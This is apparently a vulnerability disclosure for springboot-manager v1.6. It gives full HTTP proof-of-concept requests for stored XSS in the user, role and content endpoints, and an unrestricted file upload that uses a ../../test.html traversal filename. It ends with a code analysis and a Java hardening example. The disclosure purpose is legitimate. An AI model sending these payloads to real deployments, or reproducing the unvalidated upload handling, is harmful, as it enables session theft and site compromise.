springboot-manager.md

File metadata and controls

243 lines (151 loc) · 7.14 KB

Project

Address: springboot-manager

1. Stored cross-site scripting

1.1 Stored cross-site scripting /sys/user

[Suggested description]

At the /sys/user interface, script stored in a user field is executed when a user accesses the page. This kind of XSS is more dangerous than reflected XSS: it is easy to turn into worms, cookie theft, etc.

[Vendor of Product]

https://github.com/aitangbao/springboot-manager/releases/tag/v1.6

[Affected Product Code Base]

v1.6

[Affected Component]

/sys/user

POC

Store the XSS payload:

PUT /sys/user HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 195
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close

{"id":"1745973977530089473","deptId":"4bd0b0a3-097d-4902-a1f7-641ea3b771bd","username":"test<script>alert(1)</script>","password":"123456","phone":"15515512345","deptName":"部门1","status":"1"}

Trigger the vulnerability:

POST /sys/users HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close

{}

[Vulnerability recurrence]

The trigger point is User Management; the vulnerable parameter is username:

[screenshot]

Trigger the vulnerability:

[screenshot]

1.2 Stored cross-site scripting /sys/role

[Suggested description]

At the /sys/role interface, script stored in a role field is executed when a user accesses the page. This kind of XSS is more dangerous than reflected XSS: it is easy to turn into worms, cookie theft, etc.

[Vendor of Product]

https://github.com/aitangbao/springboot-manager/releases/tag/v1.6

[Affected Product Code Base]

v1.6

[Affected Component]

/sys/role

POC

Store the XSS payload:

PUT /sys/role HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 135
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close

{"id":"1745993356841861121","name":"<script>alert(1)</script>","description":"<script>alert(2)</script>","status":"1","permissions":[]}

Trigger the vulnerability:

POST /sys/roles HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close

{}

[Vulnerability recurrence]

The trigger point is Role Management; the vulnerable parameters are name and description:

[screenshot]

Trigger the vulnerability:

[screenshots]

1.3 Stored cross-site scripting /sysContent/add

[Suggested description]

At the /sysContent/add interface, script stored in a content field is executed when a user accesses the page. This kind of XSS is more dangerous than reflected XSS: it is easy to turn into worms, cookie theft, etc.

[Vendor of Product]

https://github.com/aitangbao/springboot-manager/releases/tag/v1.6

[Affected Product Code Base]

v1.6

[Affected Component]

/sysContent/add

POC

Store the XSS payload:

POST /sysContent/add HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 104
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close

{"id":"","title":"<script>alert(1)</script>","type":"0","content":"<script>alert(2)</script>","file":""}

Trigger the vulnerability:

POST /sysContent/listByPage HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close

{}

[Vulnerability recurrence]

The trigger point is Role Management; the vulnerable parameters are title and content:

[screenshots]

Trigger the vulnerability:

[screenshots]

2. File upload vulnerability

[Suggested description]

The system does not filter the suffix (extension) of uploaded files. As a result, malicious HTML/XSS files can be uploaded, which leads to stored XSS.

[Vendor of Product]

https://github.com/aitangbao/springboot-manager/releases/tag/v1.6

[Affected Product Code Base]

v1.6

[Affected Component]

/sysFiles/upload

POC

POST /sysFiles/upload?authorization=A96L7u9MTzBj87Je0HWHe77m9v4T3602%23fcf34b56-a7a2-4719-9236-867495e74c31 HTTP/1.1
Host: 192.168.0.100:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysToz7xWVQvklKbQC
Connection: close
Content-Length: 214

------WebKitFormBoundarysToz7xWVQvklKbQC
Content-Disposition: form-data; name="file"; filename="../../test.html"
Content-Type: image/jpeg

<script>alert(1)</script>
------WebKitFormBoundarysToz7xWVQvklKbQC--

[Vulnerability recurrence]

The trigger point of the vulnerability is "File Management" --> "Upload File".

[screenshots]

[Code analysis]

The upload handler calls sysFilesService.saveFile() to process the upload.

[screenshot]

saveFile() calls getFileType() to obtain the file suffix.

[screenshot]

The suffix is taken from the client-supplied file name without any validation and is simply concatenated directly into the stored file name, so an HTML suffix (and, as the PoC shows, a path prefix such as ../../) is accepted as-is.

[screenshots]
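The following is an added illustration of how the suffix handling analysed above can be hardened; it is not the project's own code, and the names getFileType()/safeStoredName() and the extension allowlist are assumptions chosen for the example. It strips any directory part before looking at the suffix, checks the suffix against an allowlist, and never reuses the client-supplied name, so the PoC file name ../../test.html is rejected while photo.JPG is accepted.

```java
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

// Illustrative hardening of the upload file-name handling; not the project's code.
public final class SafeUploadName {

    // Assumed allowlist of suffixes the file manager should accept; tune per deployment.
    // Note that the PoC sends Content-Type: image/jpeg with HTML inside, so the
    // declared MIME type cannot be used as the check; the stored suffix can.
    private static final Set<String> ALLOWED = Set.of("jpg", "jpeg", "png", "gif", "pdf", "txt", "zip");

    /** Drops any directory part, so "../../test.html" becomes "test.html". */
    static String baseName(String fileName) {
        int cut = Math.max(fileName.lastIndexOf('/'), fileName.lastIndexOf('\\'));
        return fileName.substring(cut + 1);
    }

    /** Returns the lower-case suffix without the dot, or "" if there is none. */
    static String getFileType(String fileName) {
        String base = baseName(fileName);
        int dot = base.lastIndexOf('.');
        if (dot < 0 || dot == base.length() - 1) {
            return "";
        }
        // Using the LAST dot means "trick.jpg.html" yields "html", not "jpg".
        return base.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    /** Builds the name the file is stored under, or throws if the upload is not allowed. */
    static String safeStoredName(String originalName) {
        String ext = getFileType(originalName);
        if (ext.isEmpty() || !ALLOWED.contains(ext)) {
            throw new IllegalArgumentException("file type not allowed: " + originalName);
        }
        // A random name plus the validated suffix removes traversal and encoding tricks.
        return UUID.randomUUID().toString() + "." + ext;
    }

    public static void main(String[] args) {
        // Constructed inputs; the first one is the file name from the PoC above.
        for (String name : new String[] {"../../test.html", "photo.JPG", "noext", "trick.jpg.html"}) {
            try {
                System.out.println(name + " -> " + safeStoredName(name));
            } catch (IllegalArgumentException e) {
                System.out.println(name + " -> rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

Even with the allowlist, files served back from the upload directory should be returned with Content-Disposition: attachment and a non-HTML Content-Type so that a stored file is never rendered as a page.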